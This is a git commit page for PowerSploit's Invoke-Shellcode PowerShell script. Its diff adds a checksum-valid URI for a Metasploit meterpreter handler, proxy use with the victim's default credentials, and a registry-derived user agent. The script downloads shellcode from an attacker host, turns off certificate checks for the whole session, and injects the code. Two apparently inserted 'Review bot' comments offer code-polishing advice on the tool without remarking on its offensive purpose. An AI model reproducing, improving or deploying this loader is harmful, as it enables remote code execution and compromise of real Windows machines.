author | Chris Campbell <obscuresec@gmail.com> | 2015-04-26 18:32:44 -0400 |
---|---|---|
committer | Chris Campbell <obscuresec@gmail.com> | 2015-04-26 18:32:44 -0400 |
commit | 5b1a7750c02a3939a35f933758029bb7d9145078 (patch) | |
tree | 1d5a8277c74b0c01b512ac1a21cdc926dc210b81 /CodeExecution | |
parent | 130d970c2c1c2b2b0f30e256ee3d70683969f096 (diff) | |
download | PowerSploit-5b1a7750c02a3939a35f933758029bb7d9145078.tar.gz PowerSploit-5b1a7750c02a3939a35f933758029bb7d9145078.zip |
URI fix, Proxy Support, UA Update
This fixes the URI bug submitted by @enigma0x3. Thank you for the PR as well! A legacy switch is added in case anyone is relying on this script and an older meterpreter handler.
Proxy support is added to grab the default proxy by way of a switch.
The default user-agent is grabbed from the registry instead of being a static string.
I tested this on a Windows 7 SP1 (both x86 and 64-bit) and Windows 8.1 (64-bit) with an older handler and an updated one.
Diffstat (limited to 'CodeExecution')
-rw-r--r-- | CodeExecution/Invoke--Shellcode.ps1 | 66 |
1 files changed, 58 insertions, 8 deletions
diff --git a/CodeExecution/Invoke--Shellcode.ps1 b/CodeExecution/Invoke--Shellcode.ps1
index 4d776d9..b0ba81c 100644
--- a/CodeExecution/Invoke--Shellcode.ps1
+++ b/CodeExecution/Invoke--Shellcode.ps1
@@ -49,6 +49,14 @@ Specifies the metasploit payload to use. Currently, only 'windows/meterpreter/re
 Optionally specifies the user agent to use when using meterpreter http or https payloads
+.PARAMETER Proxy
+
+Optionally specifies whether to utilize the proxy settings on the machine.
+
+.PARAMETER Legacy
+
+Optionally specifies whether to utilize the older meterpreter handler "INITM". This will likely be removed in the future.
+
 .PARAMETER Force
 Injects shellcode without prompting for confirmation. By default, Invoke-Shellcode prompts for confirmation before performing any malicious act.
@@ -179,7 +187,17 @@ http://www.exploit-monday.com
 [Parameter( ParameterSetName = 'Metasploit' )]
 [ValidateNotNull()]
 [String]
- $UserAgent = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
+ $UserAgent = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings').'User Agent',
+
+ [Parameter( ParameterSetName = 'Metasploit' )]
+ [ValidateNotNull()]
+ [Switch]
+ $Legacy = $False,
+
+ [Parameter( ParameterSetName = 'Metasploit' )]
+ [ValidateNotNull()]
+ [Switch]
+ $Proxy = $False,
 [Switch]
 $Force = $False
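Review bot: `[ValidateNotNull()]` on the new `$Legacy` and `$Proxy` parameters in the second hunk has no effect, because a `[Switch]` value is never null and PowerShell does not run validation attributes against default values; the `= $False` initializers are redundant for the same reason, since a switch already defaults to false. I'd reduce each declaration to `[Parameter( ParameterSetName = 'Metasploit' )]` / `[Switch]` / `$Legacy,` (and likewise for `$Proxy`). The `.PARAMETER Proxy` help in the first hunk says the switch uses "the proxy settings on the machine", but the implementation in the later hunk reads only the current user's `ProxyServer` value from the HKCU Internet Settings key and presents the caller's default credentials to it, so the help should state that scope, e.g. `Optionally uses the current user's WinINET ProxyServer setting (HKCU Internet Settings) with default credentials; ignored when no proxy is configured.` The param block continues outside the hunk.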
@@ -586,18 +604,51 @@ http://www.exploit-monday.com
 {
 $SSL = 's'
 # Accept invalid certificates
- [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
+ [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$True}
 }
 }
- # Meterpreter expects 'INITM' in the URI in order to initiate stage 0. Awesome authentication, huh?
- $Request = "http$($SSL)://$($Lhost):$($Lport)/INITM"
- Write-Verbose "Requesting meterpreter payload from $Request"
-
+ if ($Legacy)
+ {
+ # Old Meterpreter handler expects 'INITM' in the URI in order to initiate stage 0
+ $Request = "http$($SSL)://$($Lhost):$($Lport)/INITM"
+ Write-Verbose "Requesting meterpreter payload from $Request"
+ } else {
+
+ # Generate a URI that passes the test
+ $CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {[Char]$_}
+ $SumTest = $False
+
+ while ($SumTest -eq $False)
+ {
+ $GeneratedUri = $CharArray | Get-Random -Count 4
+ $SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92)
+ }
+
+ $RequestUri = -join $GeneratedUri
+
+ $Request = "http$($SSL)://$($Lhost):$($Lport)/$($RequestUri)"
+ }
+
 $Uri = New-Object Uri($Request)
 $WebClient = New-Object System.Net.WebClient
 $WebClient.Headers.Add('user-agent', "$UserAgent")
+ if ($Proxy)
+ {
+ $WebProxyObject = New-Object System.Net.WebProxy
+ $ProxyAddress = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings').ProxyServer
+
+ # if there is no proxy set, then continue without it
+ if ($ProxyAddress)
+ {
+
+ $WebProxyObject.Address = $ProxyAddress
+ $WebProxyObject.UseDefaultCredentials = $True
+ $WebClientObject.Proxy = $WebProxyObject
+ }
+ }
+
 try
 {
 [Byte[]] $Shellcode32 = $WebClient.DownloadData($Uri)
@@ -708,6 +759,5 @@ http://www.exploit-monday.com
 {
 Inject-LocalShellcode
 }
- }
-
+ }
 } |
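Review bot: The rewritten `ServerCertificateValidationCallback = {$True}` line in the first hunk here changes only brace spacing while leaving a process-wide effect undocumented: `ServicePointManager` is static, so once this runs every HTTPS request made later in the same PowerShell session skips certificate validation, not just the single `DownloadData` call, and nothing in the hunk resets it. Since the line is already being touched, the `# Accept invalid certificates` comment above it should record that scope, e.g. `# Accept invalid certificates -- NOTE: static, session-wide setting, not scoped to this one request`. As a point of style, pre-seeding `$SumTest = $False` and looping with `while ($SumTest -eq $False)` reads more naturally as `do { … } until ($SumTest)`, which drops the initializer and the explicit `-eq $False`. The enclosing function body continues on both sides of the hunk.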